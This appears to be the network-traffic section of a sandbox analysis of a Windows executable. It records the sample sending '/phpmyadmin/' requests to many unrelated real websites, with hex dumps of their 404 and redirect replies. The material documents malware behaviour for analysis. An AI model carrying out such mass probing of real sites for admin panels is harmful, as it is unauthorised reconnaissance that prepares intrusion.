                                                                                                                                                                                                    2023-11-26 05:59:30 UTC1369INData Raw: 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f
                                                                                                                                                                                                    Data Ascii: oter,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;fo
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC1369INData Raw: 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 65 6d 70 6c 61 74 65 2d 70
                                                                                                                                                                                                    Data Ascii: -dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-p
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC1369INData Raw: 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 32 2c 31 38 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a
                                                                                                                                                                                                    Data Ascii: gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red:
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC1369INData Raw: 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69
                                                                                                                                                                                                    Data Ascii: font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spaci
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC1369INData Raw: 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75
                                                                                                                                                                                                    Data Ascii: .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: au
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC1369INData Raw: 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67
                                                                                                                                                                                                    Data Ascii: hite) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orang


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    28192.168.2.45167547.246.24.2114436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC169OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: wonka.cc
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC734INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 41 53 50 2e 4e 45 54 5f 53 65 73 73 69 6f 6e 49 64 3d 69 6b 63 6b 64 6c 79 6e 6d 33 67 6b 69 79 6f 6e 65 65 63 32 73 6a 70 63 3b 20 70 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 3b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: TengineContent-Type: text/html; charset=utf-8Content-Length: 103Connection: closeDate: Sun, 26 Nov 2023 05:59:30 GMTCache-Control: privateSet-Cookie: ASP.NET_SessionId=ikckdlynm3gkiyoneec2sjpc; path=/; HttpOnly;
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC103INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6e 77 7a 69 6d 67 2e 77 65 7a 68 61 6e 2e 6e 65 74 2f 73 74 61 74 69 63 2d 6a 73 2f 70 61 67 65 34 30 34 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script src='https://nwzimg.wezhan.net/static-js/page404.js'></script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    29192.168.2.452342103.224.212.2264436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: ondania.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC340INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 5f 74 61 64 3d 31 37 30 30 39 37 38 33 36 39 2e 35 38 30 33 36 39 34 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 33 2d 4e 6f 76 2d 32 30 33 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 33 36 30 30 30 30 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 33 38 2e 6f 6e 64 61 6e 69 61 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 3f 73 75 62 69 64 31 3d 32 30 32 33 31 31 32 36 2d 31 36 35 39 2d 32 39 35 66 2d 61 35 34 32 2d 36 30 33 63 63 63 30 36 64
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 Founddate: Sun, 26 Nov 2023 05:59:29 GMTserver: Apacheset-cookie: __tad=1700978369.5803694; expires=Wed, 23-Nov-2033 05:59:29 GMT; Max-Age=315360000location: http://ww38.ondania.com/phpmyadmin/?subid1=20231126-1659-295f-a542-603ccc06d
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC2INData Raw: 0a 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    30192.168.2.450955148.66.138.1934436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: octetpowers.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC298INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 30 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Conten
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC1699INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    31192.168.2.452329202.226.37.1584436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: daisyokogyo.co.jp
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC165INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: closeLocation: /


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    32192.168.2.453656172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC634INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 65 73 6f 66 74 2e 61 63 61 64 65 6d 79 2f 70 68 70 6d 79 61 64 6d 69 6e 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeLocation: https://esoft.academy/phpmyadminCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC422INData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 7d 0a 20 20 20 20 2e 65 72 72 6f 72 20 7b 63 6f 6c 6f 72 3a 20 23 65 30 30 3b 7d 0a 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 7d 0a 20 20 20 20 68 31 20 7b 66
                                                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title><style> body {margin: 20px; font-family: helvetica, sans-serif; max-width: 800px;} .error {color: #e00;} pre {font-size: 16px;} h1 {f
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    33192.168.2.451886117.20.63.1484436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: student.debritto.sch.id
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 31 31 37 2e 32 30 2e 36 33 2e 31 34 38 3a 32 30 33 30 2f 70 6d 61 2f 0d 0a 58 2d 43 61 63 68 65 3a 20 48 49 54 20 66 72 6f 6d 20 42 61 63 6b 65 6e 64 0d 0a 53 74 72 69 63 74 2d 54 72 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginx/1.20.1Date: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 238Connection: closeLocation: http://117.20.63.148:2030/pma/X-Cache: HIT from BackendStrict-Tra
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC238INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 31 37 2e 32 30 2e 36 33 2e 31 34 38 3a 32 30 33 30 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://117.20.63.148:2030/pma/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    34192.168.2.45501167.205.16.724436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: capforge.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC512INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 62 69 64 3d 61 61 61
